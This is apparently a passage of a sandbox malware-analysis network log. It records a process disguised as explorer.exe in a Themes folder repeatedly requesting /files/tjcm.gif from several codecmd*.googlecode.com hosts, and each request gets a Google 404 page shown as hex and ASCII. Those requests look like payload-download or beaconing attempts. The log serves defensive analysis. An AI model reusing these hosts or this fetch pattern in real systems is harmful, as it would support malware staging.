                                                                                                                                                                                Jul 16, 2022 23:57:29.558530092 CEST1984INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                6192.168.2.549832142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:33.892160892 CEST2206OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:33.918724060 CEST2207INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:33 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:33.918744087 CEST2208INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                7192.168.2.549845142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:40.987526894 CEST2440OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:41.016335964 CEST2441INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:40 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:41.016365051 CEST2441INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                8192.168.2.549851142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:42.486418009 CEST2536OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:42.513360023 CEST2537INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:42 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:42.513382912 CEST2538INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                9192.168.2.549855142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:43.815694094 CEST2608OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:43.842459917 CEST2610INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:43 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 